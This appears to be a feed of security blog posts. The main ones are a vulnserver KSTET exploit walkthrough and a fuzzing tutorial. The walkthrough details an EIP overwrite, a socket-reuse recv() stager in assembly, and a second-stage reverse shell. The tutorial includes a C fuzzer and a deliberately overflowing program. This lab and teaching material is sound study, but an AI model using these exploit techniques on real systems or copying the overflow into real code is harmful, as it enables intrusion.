On one hand, I was a little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I had wanted for some time.

On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it 😃 It's not a vulnerability, it's a technique 😃

I would like to thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, whereas success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here 😃). In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises.

Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction from a unique discovery.

APC Series: User APC Internals

Low Level Pleasure

2 June 2020 at 21:00

Hey! This is the second part of the APC Series, where I explore the internals of APC objects in Windows. If you haven’t read it, I recommend you read the first post about User APC API. In this part I’ll explain: How to queue user APCs from kernel mode? How are user APCs implemented in the Windows kernel? How are user APCs delivered to user mode? In this blog I won’t cover the internals of Special User APCs, because Special User APCs rely on Kernel APCs to perform their operation - I’ll explore this type in a future post after I explain Kernel APCs.

Multi-Stage EIP redirection Buffer Overflow -- Win API / Socket Reuse

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

2 June 2020 at 19:26

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (KSTET)

Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

//*****//

We get the initial crash using the following fuzzer.

...and we get a pretty vanilla EIP overwrite buffer overflow.

Calculating the offset as usual using Metasploit's pattern_offset.rb and pattern_create.rb
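
For readers without Metasploit at hand, here is a rough Python sketch of what pattern_create.rb and pattern_offset.rb do. The function names and the EIP value used in the usage note are made up for illustration; the real offset for KSTET is not reproduced here.

```python
import string
import struct

def pattern_create(length):
    """Build a cyclic pattern of upper/lower/digit triples: Aa0Aa1Aa2..."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(eip_value, length):
    """Return the offset of the 4 pattern bytes found in EIP, or -1."""
    # EIP is read as a little-endian DWORD, so unpack it back into bytes.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)
```

As a usage example, a (hypothetical) EIP value of 0x61413161 corresponds to the bytes "a1Aa", which sit at offset 4 of the pattern.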

We have our offset value, so at this point we need to find a JMP ESP address and redirect EIP to it. We will use address 0x625011AF.

Note that you can use Immunity Debugger's mona.py or just search it manually.

Updated POC with the offset value and JMP ESP address.

As we examine the crash in Immunity Debugger, we can see that the offset value is correct and that we hit our JMP ESP address. However, once the jump is taken, our Cs have been truncated. As a result, this only gives us about 20 bytes of space.

That said, we will use the C buffer space to do a reverse jump into the A's address space, which gives us roughly 66 bytes to work with.

The reverse jump is encoded as EB B8 and jumps from address 0x00D0F9E0 to 0x00D0F99A.
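
The landing address can be double-checked by hand: EB is a short JMP whose single operand byte is a signed displacement counted from the end of the 2-byte instruction. A small sketch (the helper name is mine):

```python
def short_jmp_target(instruction_address, rel8):
    """Destination of a 2-byte short JMP (EB xx) located at instruction_address."""
    # The operand is a signed 8-bit displacement relative to the next instruction.
    displacement = rel8 - 0x100 if rel8 >= 0x80 else rel8
    return (instruction_address + 2 + displacement) & 0xFFFFFFFF

target = short_jmp_target(0x00D0F9E0, 0xB8)
print(hex(target))
```

0xB8 is -72 as a signed byte, so the jump goes 70 bytes back from the address of the instruction itself.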

We update and send our exploit...then take the jump.

Once again, we examine the crash and see that we have successfully landed on A's address space.

Now the fun part begins..thanks to https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html for pointing out this type of vector.

Stolen from purpl3f0xsec...the diagram below shows how the socket connection is established between the client and the vulnserver.

Basically, we will utilize (reuse) the recv() function call. The idea is to utilize the established socket() connection and use the recv() as the first stage payload. Once the recv() function is up and running, we will then send our second stage payload.

The second stage payload will not overflow the buffer so it will not get truncated.

More information about the recv() can be found here: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv

To set up recv(), we need the following parameters.

Socket = socket descriptor

Buffer = memory location for our second stage payload

BufferSize = memory space allocation for our second stage payload

Flags = Socket flags…can be set to Null

These parameters will need to be pushed onto the stack (don't forget: in reverse order).
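
To see why the order is reversed, here is a tiny model of the stack. It assumes the usual convention where the first argument has to end up on top of the stack; the values are the ones that show up later in this post.

```python
# recv(socket, buffer, length, flags) in declaration order.
RECV_ARGS = [
    ("socket", 0x00000050),
    ("buffer", 0x00EEF97C),
    ("length", 0x00000400),
    ("flags", 0x00000000),
]

def push_in_reverse(args):
    """Push the arguments last-to-first; index 0 of the result is the stack top."""
    stack = []
    for name, value in reversed(args):
        stack.insert(0, (name, value))  # a PUSH places the value on top
    return stack

for name, value in push_in_reverse(RECV_ARGS):
    print(f"{name:<7} 0x{value:08X}")
```

Pushing flags first and the socket descriptor last leaves the socket descriptor on top, which is where the callee expects its first argument.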

Before I populated the parameters, I grabbed the address of recv() which can be done by going in to the .text entry point and if we scroll down, we will find the functions.

Address 0x00401953 has the recv() but if you double click it...it shows the actual address which is 0x0040252C

I set a breakpoint at address 0x0040252C.

Once we hit our breakpoint, if you look at the stack, we can see the parameters that are currently loaded in the stack.

Note that at this point...both EAX and EBX registers have the socket descriptor value of 0x00000050. This is because of the instructions at these addresses: 0x0040194A and 0x00401950

0x0040194A - MOV EAX, DWORD PTR SS: [EBP-420]

This is a pointer to [EBP-420], so whatever value is stored at [EBP-420] gets moved into EAX.

We can see that EBP currently points to address 0x00EEFF88, so subtracting 0x420 should get us to the address that holds the socket descriptor.

As expected, if we jump to address 0x00EEFB68...we can see the value 0x00000050 loaded in.
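
The subtraction is easy to verify outside the debugger. Note that the 420 in [EBP-420] is hexadecimal. A quick sketch (the helper name is mine):

```python
def stack_slot(ebp, displacement):
    """Address of [EBP - displacement] in a 32-bit address space."""
    return (ebp - displacement) & 0xFFFFFFFF

socket_slot = stack_slot(0x00EEFF88, 0x420)
print(f"0x{socket_slot:08X}")
```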

Now, address 0x00401950 has the following instructions..

0x00401950 - MOV DWORD PTR SS:[ESP], EAX

This basically just loads the socket descriptor value stored in EAX to the [ESP] pointer. We can verify this by following ESP in the stack, which currently points to address 0x011CF9E0.

Next, we will load the address of the socket descriptor into EAX. Since ASLR is enabled, we will need to do some math, and we will use ESP's address as a reference point.

We know that the socket descriptor is stored at [EBP-420], which is address 0x00EEFB68. This means that we will need to do the following:

0x00EEFB68 (socket descriptor address) - 0x00EEF9E0 (ESP) = 188 (in hex)

Great..so we will need to add 188 to ESP. We will do this by pushing ESP onto the stack, popping it into EAX, and then adding 188 to EAX. If our calculation is correct, we should have the socket descriptor address (0x00EEFB68) loaded into EAX.

We run the following instructions:

PUSH ESP

POP EAX

ADD AX, 188

And we can see that address 00EEFB68 is now loaded in EAX which contains the socket descriptor value of 0x00000050 as shown in the stack.
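
Here is a small sketch of what ADD AX, 188 does to EAX. Only the low 16 bits are touched, which works here because the addition does not carry out of them. A likely reason for using AX is that ADD EAX, 0x188 would need a 32-bit immediate (88 01 00 00) full of null bytes; that motivation is my reading, not something stated above.

```python
def add_ax(eax, imm16):
    """Emulate ADD AX, imm16: only the low 16 bits of EAX are modified."""
    low = ((eax & 0xFFFF) + imm16) & 0xFFFF
    return (eax & 0xFFFF0000) | low

esp = 0x00EEF9E0
delta = 0x00EEFB68 - esp          # distance from ESP to the socket descriptor
eax = add_ax(esp, delta)          # PUSH ESP / POP EAX / ADD AX, 188
print(f"delta=0x{delta:X} eax=0x{eax:08X}")
```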

Great...now we have the socket descriptor easily accessible!

Re-aligning ESP

At this point, we will have to re-align ESP so that we don't arbitrarily overlap with our first stage instructions. As we push more instructions to the stack, especially in a small address space, we risk overlapping our first stage with ESP.

That said, we need to move our ESP below where our first stage will be loaded.

We use the following instructions to adjust ESP:

SUB ESP, 6C ;SUB 108 from ESP

This makes ESP point to 0x00EEF974

***Note that towards the end of the exploit development, I found that ESP needed to point directly below the recv() parameters. That meant I had to adjust ESP and subtract only 64 (hex), which pointed it to address 0x00EEF97C instead.
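
Both adjustments can be checked with plain arithmetic, starting from the ESP value of 0x00EEF9E0 used earlier (the helper name is mine):

```python
def sub_esp(esp, imm):
    """Emulate SUB ESP, imm on a 32-bit register."""
    return (esp - imm) & 0xFFFFFFFF

esp = 0x00EEF9E0
first_attempt = sub_esp(esp, 0x6C)   # 0x6C is 108 in decimal
final_value = sub_esp(esp, 0x64)     # 0x64 is 100 in decimal
print(f"0x{first_attempt:08X} 0x{final_value:08X}")
```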

At this point, we have accomplished the following:

1. Located the address for the recv() function

2. Located the address that holds the socket descriptor value

3. Loaded the socket descriptor value to EAX

4. Aligned the stack to ensure our first stage does not overlap with ESP

Now we are ready to populate the parameters for our recv() function call.

Note that we need 4 parameters for this function call, pushed to the stack in reverse order.

0x1 - Param #4 (Flags)

Since we are not setting any flags, we will set this parameter to NULL.

Using the EBX register...we zero it out using the XOR instruction before pushing it to the stack

XOR EBX, EBX

PUSH EBX

0x2 - Param #3 (Buffer Size)

For the buffer size, I picked about 1024 bytes of buffer space which is a lot more than what we need.

Utilizing the EBX register again which is already set to zero...we will add 400 (in hex) to it.

ADD BH, 4

PUSH EBX
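
BH is bits 8 to 15 of EBX, so adding 4 to it adds 4 * 256 to the full register. Here is a sketch of that, assuming EBX is still zero from the XOR. The byte encodings in the comments are the standard x86 ones; the null-byte motivation is my interpretation.

```python
def add_bh(ebx, imm8):
    """Emulate ADD BH, imm8: only bits 8..15 of EBX are modified."""
    bh = (((ebx >> 8) & 0xFF) + imm8) & 0xFF
    return (ebx & 0xFFFF00FF) | (bh << 8)

ebx = add_bh(0x00000000, 4)
print(hex(ebx), ebx)

# PUSH 0x400 would encode as 68 00 04 00 00 (null bytes),
# while ADD BH, 4 is 80 C7 04 and PUSH EBX is 53.
```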

0x3 - Param # 2 (Buffer Location)

I initially pointed the buffer location to the beginning of the Cs (0x00EEF9E4); however, it didn't work, so I had to point it right after the four parameters. In this case, the buffer location has to be pointed to address 0x00EEF97C

We can use the ESP address again...load the address into EBX, then do some math, which in this case meant adding 120 (hex 78) to it

PUSH ESP

POP EBX

ADD EBX, 78

PUSH EBX
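
Taking the numbers quoted in this post at face value, the 0x78 displacement can be traced like this. The sketch assumes ESP starts at 0x00EEF9E0, is lowered with SUB ESP, 6C, and that two DWORDs (flags and buffer size) have been pushed before PUSH ESP runs.

```python
def buffer_pointer(start_esp, sub_amount, dwords_pushed, displacement):
    """Value left in EBX after PUSH ESP / POP EBX / ADD EBX, displacement."""
    esp = start_esp - sub_amount          # SUB ESP, sub_amount
    esp -= 4 * dwords_pushed              # each PUSH lowers ESP by 4
    return (esp + displacement) & 0xFFFFFFFF

pointer = buffer_pointer(0x00EEF9E0, 0x6C, 2, 0x78)
print(f"0x{pointer:08X}")
```

Under those assumptions the result is 0x00EEF9E4, the start of the Cs, which was the first buffer location tried. The same displacement combined with the later SUB ESP, 64 variant would not give 0x00EEF97C, so the final POC presumably used a different value, which the text does not state.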

0x4 - Param #1 (Socket Descriptor)

Finally, for the socket descriptor we will need to access the value currently stored in EAX (not EAX address itself)

EAX is still pointing to 0x00EEFB68 that holds the socket descriptor value of 0x00000050

We can simply push the value stored in EAX using the following instruction:

PUSH DWORD PTR DS:[EAX]

...and we are done with the parameters.

At this point, we should have the following parameters.

Socket descriptor = 0x00000050

Buffer location = beginning of our C's (NOTE: this was adjusted to address 0x00EEF97C)

Buffer size = 400 (1024 in dec)

Flags = 0

Calling the RECV()

With the parameters set, we are now ready to call our RECV() function. Note that the RECV() function is at address 0x0040252C

As you can see, the recv() address contains a null byte, which will need to be removed. I learned something new from https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html as to how to remove these null bytes.

We simply use a null-free stand-in value: drop the leading null byte and append 90 as the lowest byte, giving 0x40252C90 instead of 0x0040252C

So we move this arbitrary address to EAX:

MOV EAX, 40252C90

Then we shift right by 8 bits, which drops the lowest 8 bits (0x90) and fills the highest 8 bits with 00

SHR EAX, 8

Finally, we simply CALL EAX
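
The shift trick is easy to sanity check. This sketch confirms that the stand-in value contains no null bytes and that a logical right shift by 8 restores the real recv() address (the helper name is mine):

```python
import struct

def shr32(value, bits):
    """Emulate SHR on a 32-bit register (logical shift, zero-filled from the left)."""
    return (value & 0xFFFFFFFF) >> bits

stand_in = 0x40252C90
encoded = struct.pack("<I", stand_in)      # immediate bytes as they sit in the payload
recv_address = shr32(stand_in, 8)
print(encoded.hex(), f"0x{recv_address:08X}")
```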

Here just right before we execute CALL EAX, we can see that it currently points to the recv() address

That is the entire first stage...and we update our POC as shown below
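
The POC itself is not reproduced here, but the instructions listed so far can be hand-assembled into bytes roughly as follows. This is my own sketch, not the author's POC: the encodings are the standard x86 ones for each mnemonic, and the operands are the values first quoted above (SUB ESP, 6C and ADD EBX, 78), which the author says were adjusted later.

```python
FIRST_STAGE = b"".join([
    b"\x54",                  # PUSH ESP
    b"\x58",                  # POP EAX
    b"\x66\x05\x88\x01",      # ADD AX, 0x188     (EAX -> socket descriptor slot)
    b"\x83\xEC\x6C",          # SUB ESP, 0x6C     (move ESP out of the way)
    b"\x31\xDB",              # XOR EBX, EBX
    b"\x53",                  # PUSH EBX          (flags = 0)
    b"\x80\xC7\x04",          # ADD BH, 4         (EBX = 0x400)
    b"\x53",                  # PUSH EBX          (buffer size)
    b"\x54",                  # PUSH ESP
    b"\x5B",                  # POP EBX
    b"\x83\xC3\x78",          # ADD EBX, 0x78
    b"\x53",                  # PUSH EBX          (buffer location)
    b"\xFF\x30",              # PUSH DWORD PTR [EAX] (socket descriptor value)
    b"\xB8\x90\x2C\x25\x40",  # MOV EAX, 0x40252C90
    b"\xC1\xE8\x08",          # SHR EAX, 8        (EAX = 0x0040252C)
    b"\xFF\xD0",              # CALL EAX
])

print(len(FIRST_STAGE), "bytes, null-free:", b"\x00" not in FIRST_STAGE)
```

The stager comes out well under the roughly 66 bytes available in the A's buffer and contains no null bytes.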

We fire up the exploit once more, step through the stager, and we can see that we have all 4 parameters ready to go…they are followed with the address of where our payload will be loaded.

Second Stage / Reverse Shell

With our RECV() function ready, we can send our second stage payload.

We update our POC and see if we can add the Ds to memory.

Note that I added a sleep(5) between the first and second stage. This ensures that our RECV() function is ready before we send the second stage payload.
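
The send logic might look something like the sketch below. The function name and the RecordingSocket stand-in are hypothetical and only there so the ordering can be exercised without a live target; in a real run `sock` would be a connected `socket.socket`.

```python
import time

def send_two_stages(sock, first_stage, second_stage, delay_seconds=5):
    """Send the stager, wait for its recv() call to be set up, then send stage two."""
    sock.send(first_stage)
    time.sleep(delay_seconds)     # give the stager time to reach CALL EAX
    sock.send(second_stage)

class RecordingSocket:
    """Stand-in for a connected socket; it just records what was sent."""
    def __init__(self):
        self.sent = []

    def send(self, data):
        self.sent.append(data)
        return len(data)

demo = RecordingSocket()
send_two_stages(demo, b"<first stage>", b"D" * 8, delay_seconds=0)
print(demo.sent)
```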

Here we can see that we have successfully loaded our Ds to memory at address 0x011EFD7C or 0x00EEFD7C (note ASLR).

We then replace the Ds with an actual reverse shell, fire up the exploit, and we get a reverse shell!

Thank you for reading.

Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage

The Human Machine Interface

By: h0mbre

26 May 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’, we’ll be continuing on our by-noobs-for-noobs fuzzing journey and trying to wrap our little baby fuzzing brains around the concept of code coverage and why it’s so important. As far as I know, code coverage is, at a high-level, the attempt made by fuzzers to track/increase how much of the target application’s code is reached by the fuzzer’s inputs. The idea being that the more code your fuzzer inputs reach, the greater the attack surface, the more comprehensive your testing is, and other big brain stuff that I don’t understand yet.

I’ve been working on my pwn skills, but taking short breaks for sanity to write some C and watch some @gamozolabs streams. @gamozolabs broke down the importance of code coverage during one of these streams, and I cannot for the life of me track down the clip, but I remembered it vaguely enough to set up some test cases just for my own testing to demonstrate why “dumb” fuzzers are so disadvantaged compared to code-coverage-guided fuzzers. Get ready for some (probably incorrect 🤣) 8th grade probability theory. By the end of this blog post, we should be able to at least understand, broadly, how state of the art fuzzers worked in 1990.

Our Fuzzer

We have this beautiful, error free, perfectly written, single-threaded jpeg mutation fuzzer that we’ve ported to C from our previous blog posts and tweaked a bit for the purposes of our experiments here.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h> 
#include <fcntl.h>

int crashes = 0;

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_data(char* fuzz_target) {

    FILE *fileptr;
    char *clone_data;
    long filelen;

    // open file in binary read mode
    // jump to end of file, get length
    // reset pointer to beginning of file
    fileptr = fopen(fuzz_target, "rb");
    if (fileptr == NULL) {
        printf("[!] Unable to open fuzz target, exiting...\n");
        exit(1);
    }
    fseek(fileptr, 0, SEEK_END);
    filelen = ftell(fileptr);
    rewind(fileptr);

    // cast malloc as char ptr
    // ptr offset * sizeof char = data in .jpeg
    clone_data = (char *)malloc(filelen * sizeof(char));

    // get length for struct returned
    size_t length = filelen * sizeof(char);

    // read in the data
    fread(clone_data, filelen, 1, fileptr);
    fclose(fileptr);

    struct ORIGINAL_FILE original_file;
    original_file.data = clone_data;
    original_file.length = length;

    return original_file;
}

void create_new(struct ORIGINAL_FILE original_file, size_t mutations) {

    //
    //----------------MUTATE THE BITS-------------------------
    //
    int* picked_indexes = (int*)malloc(sizeof(int)*mutations);
    for (int i = 0; i < (int)mutations; i++) {
        picked_indexes[i] = rand() % original_file.length;
    }

    char * mutated_data = (char*)malloc(original_file.length);
    memcpy(mutated_data, original_file.data, original_file.length);

    for (int i = 0; i < (int)mutations; i++) {
        // overwrite the selected byte with a random value in [0, 255]
        int rand_byte = rand() % 256;
        
        mutated_data[picked_indexes[i]] = (char)rand_byte;
    }

    //
    //---------WRITING THE MUTATED BITS TO NEW FILE-----------
    //
    FILE *fileptr;
    fileptr = fopen("mutated.jpeg", "wb");
    if (fileptr == NULL) {
        printf("[!] Unable to open mutated.jpeg, exiting...\n");
        exit(1);
    }
    // buffer to be written from,
    // size in bytes of elements,
    // how many elements,
    // where to stream the output to :)
    fwrite(mutated_data, 1, original_file.length, fileptr);
    fclose(fileptr);
    free(mutated_data);
    free(picked_indexes);
}

void exif(int iteration) {
    
    //fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");
    char* file = "vuln";
    char* argv[3];
    argv[0] = "vuln";
    argv[1] = "mutated.jpeg";
    argv[2] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);
        

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

int main(int argc, char** argv) {

    if (argc < 3) {
        printf("Usage: ./cfuzz <valid jpeg> <num of fuzz iterations>\n");
        printf("Usage: ./cfuzz Canon_40D.jpg 10000\n");
        exit(1);
    }

    // get our random seed
    srand((unsigned)time(NULL));

    char* fuzz_target = argv[1];
    struct ORIGINAL_FILE original_file = get_data(fuzz_target);
    printf("[>] Size of file: %zu bytes.\n", original_file.length);
    size_t mutations = (original_file.length - 4) * .02;
    printf("[>] Flipping up to %zu bytes.\n", mutations);

    int iterations = atoi(argv[2]);
    printf("[>] Fuzzing for %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        create_new(original_file, mutations);
        exif(i);
    }
    
    printf("\n[>] Fuzzing completed, exiting...\n");
    return 0;
}

Not going to spend a lot of time on the fuzzer’s features (what features?) here, but some important things about the fuzzer code:

it takes a file as input and copies the bytes from the file into a buffer
it calculates the length of the buffer in bytes, and then mutates 2% of the bytes by randomly overwriting them with arbitrary bytes
the function responsible for the mutation, create_new, doesn’t keep track of what byte indexes were mutated so theoretically, the same index could be chosen for mutation multiple times, so really, the fuzzer mutates up to 2% of the bytes.
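
To put a number on "up to 2%", here is a quick Python sketch for a 7958-byte input (the size of the sample file used below). It assumes the indexes are picked uniformly at random, which rand() % length only approximates.

```python
FILE_SIZE = 7958

# Same formula as in main(): 2% of (length - 4), truncated to an integer.
mutations = int((FILE_SIZE - 4) * 0.02)

# Expected number of distinct indexes hit when drawing `mutations` times
# with replacement from FILE_SIZE positions.
expected_distinct = FILE_SIZE * (1 - (1 - 1 / FILE_SIZE) ** mutations)

print(mutations, round(expected_distinct, 1))
```

So on average one or two of the picks per iteration land on an index that was already chosen.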

Small Detour, I Apologize

We only have one mutation method here to keep things super simple, in doing so, I actually learned something really useful that I hadn’t clearly thought out previously. In a previous post I wondered, embarrassingly, aloud and in print, how much different random bit flipping was from random byte overwriting (flipping?). Well, it turns out, they are super different. Let’s take a minute to see how.

Let’s say we’re mutating an array of bytes called bytes. We’re mutating index 5. bytes[5] == \x41 (65 in decimal) in the unmutated, pristine original file. If we only bit flip, we are super limited in how much we can mutate this byte. 65 is 01000001 in binary. Let’s just go through and see how much it changes from arbitrarily flipping one bit:

Flipping first bit: 11000001 = 193,
Flipping second bit: 00000001 = 1,
Flipping third bit: 01100001 = 97,
Flipping fourth bit: 01010001 = 81,
Flipping fifth bit: 01001001 = 73,
Flipping sixth bit: 01000101 = 69,
Flipping seventh bit: 01000011 = 67, and
Flipping eighth bit: 01000000 = 64.

As you can see, we’re locked in to a severely limited amount of possibilities.
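
The list above can be reproduced with a few lines of Python, counting bits from the most significant one as the list does:

```python
ORIGINAL = 0x41  # 65, 01000001 in binary

# Flip each of the 8 bits in turn, starting with the most significant one.
flipped = [ORIGINAL ^ (0x80 >> position) for position in range(8)]

for position, value in enumerate(flipped, start=1):
    print(f"bit {position}: {value:08b} = {value}")

# A single bit flip can only produce 8 different values, while overwriting
# the whole byte can produce any of the 255 other values.
print(len(set(flipped)), "reachable values via one bit flip")
```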

So for this program, I’ve opted to replace this mutation method with one that instead just substitutes a random byte instead of a bit within the byte.

Vulnerable Program

I wrote a simple cartoonish program to demonstrate how hard it can be for “dumb” fuzzers to find bugs. Imagine a target application that has several decision trees in the disassembly map view of the binary. The application performs 2-3 checks on the input to see if it meets certain criteria before passing the input to some sort of vulnerable function. Here is what I mean:

Our program does this exact thing, it retrieves the bytes of an input file and checks the bytes at an index 1/3rd of the file length, 1/2 of the file length, and 2/3 of the file length to see if the bytes in those positions match some hardcoded values (arbitrary). If all the checks are passed, the application copies the byte buffer into a small buffer causing a segfault to simulate a vulnerable function. Here is our program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_bytes(char* fileName) {

    FILE *filePtr;
    char* buffer;
    long fileLen;

    filePtr = fopen(fileName, "rb");
    if (!filePtr) {
        printf("[>] Unable to open %s\n", fileName);
        exit(-1);
    }
    
    if (fseek(filePtr, 0, SEEK_END)) {
        printf("[>] fseek() failed, wtf?\n");
        exit(-1);
    }

    fileLen = ftell(filePtr);
    if (fileLen == -1) {
        printf("[>] ftell() failed, wtf?\n");
        exit(-1);
    }

    errno = 0;
    rewind(filePtr);
    if (errno) {
        printf("[>] rewind() failed, wtf?\n");
        exit(-1);
    }

    long trueSize = fileLen * sizeof(char);
    printf("[>] %s is %ld bytes.\n", fileName, trueSize);
    buffer = (char *)malloc(fileLen * sizeof(char));
    fread(buffer, fileLen, 1, filePtr);
    fclose(filePtr);

    struct ORIGINAL_FILE original_file;
    original_file.data = buffer;
    original_file.length = trueSize;

    return original_file;
}

void check_one(char* buffer, int check) {

    if (buffer[check] == '\x6c') {
        return;
    }
    else {
        printf("[>] Check 1 failed.\n");
        exit(-1);
    }
}

void check_two(char* buffer, int check) {

    if (buffer[check] == '\x57') {
        return;
    }
    else {
        printf("[>] Check 2 failed.\n");
        exit(-1);
    }
}

void check_three(char* buffer, int check) {

    if (buffer[check] == '\x21') {
        return;
    }
    else {
        printf("[>] Check 3 failed.\n");
        exit(-1);
    }
}

void vuln(char* buffer, size_t length) {

    printf("[>] Passed all checks!\n");
    char vulnBuff[20];

    memcpy(vulnBuff, buffer, length);

}

int main(int argc, char *argv[]) {
    
    if (argc < 2 || argc > 2) {
        printf("[>] Usage: vuln example.txt\n");
        exit(-1);
    }

    char *filename = argv[1];
    printf("[>] Analyzing file: %s.\n", filename);

    struct ORIGINAL_FILE original_file = get_bytes(filename);

    int checkNum1 = (int)(original_file.length * .33);
    printf("[>] Check 1 no.: %d\n", checkNum1);

    int checkNum2 = (int)(original_file.length * .5);
    printf("[>] Check 2 no.: %d\n", checkNum2);

    int checkNum3 = (int)(original_file.length * .67);
    printf("[>] Check 3 no.: %d\n", checkNum3);

    check_one(original_file.data, checkNum1);
    check_two(original_file.data, checkNum2);
    check_three(original_file.data, checkNum3);
    
    vuln(original_file.data, original_file.length);
    

    return 0;
}

Keep in mind that this is only one type of criteria, there are several different types of criteria that exist in binaries. I selected this one because the checks are so specific it can demonstrate, in an exaggerated way, how hard it can be to reach new code purely by randomness.

Our sample file, which we’ll mutate and feed to this vulnerable application is still the same file from the previous posts, the Canon_40D.jpg file with exif data.

h0mbre@pwn:~/fuzzing$ file Canon_40D.jpg 
Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, frames 3
h0mbre@pwn:~/fuzzing$ ls -lah Canon_40D.jpg 
-rw-r--r-- 1 h0mbre h0mbre 7.8K May 25 06:21 Canon_40D.jpg

The file is 7958 bytes long. Let’s feed it to the vulnerable program and see what indexes are chosen for the checks:

h0mbre@pwn:~/fuzzing$ vuln Canon_40D.jpg 
[>] Analyzing file: Canon_40D.jpg.
[>] Canon_40D.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Check 1 failed.

So we can see that indexes 2626, 3979, and 5331 were chosen for testing and that the file failed the first check as the byte at that position wasn’t \x6c.
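
These indexes come straight from the .33, .5 and .67 multipliers in main(), truncated to integers. A quick check in Python (the function name is mine):

```python
def check_indexes(length):
    """Mirror the (int)(length * factor) casts from the vulnerable program."""
    return [int(length * factor) for factor in (0.33, 0.5, 0.67)]

print(check_indexes(7958))
```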

Experiment 1: Passing Only One Check

Let’s take away checks two and three and see how our dumb fuzzer performs against the binary when we only have to pass one check.

I’ll comment out checks two and three:

check_one(original_file.data, checkNum1);
//check_two(original_file.data, checkNum2);
//check_three(original_file.data, checkNum3);
    
vuln(original_file.data, original_file.length);

And so now, we’ll take our unaltered jpeg, which naturally does not pass the first check, and have our fuzzer mutate it and send it to the vulnerable application hoping for crashes. Remember, that the fuzzer mutates up to 159 bytes of the 7958 bytes total each fuzzing iteration. If the fuzzer randomly inserts an \x6c into index 2626, we will pass the first check and execution will pass to the vulnerable function and cause a crash. Let’s run our dumb fuzzer 1 million times and see how many crashes we get.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_40D.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 88
[>] Fuzzing completed, exiting...

So out of 1 million iterations, we got 88 crashes. So on about 0.0088% of our iterations, we met the criteria to pass check 1 and hit the vulnerable function. Let’s double check our crash to make sure there’s no error in any of our code (I fuzzed the vulnerable program with all checks enabled in QEMU mode (to simulate not having source code) with AFL for 14 hours and wasn’t able to crash the program so I hope there are no bugs that I don’t know about 😬).

h0mbre@pwn:~/fuzzing/ccrashes$ vuln 998636.11 
[>] Analyzing file: 998636.11.
[>] 998636.11 is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Passed all checks!
Segmentation fault

So feeding the vulnerable program one of the crash inputs actually does crash it. Cool.

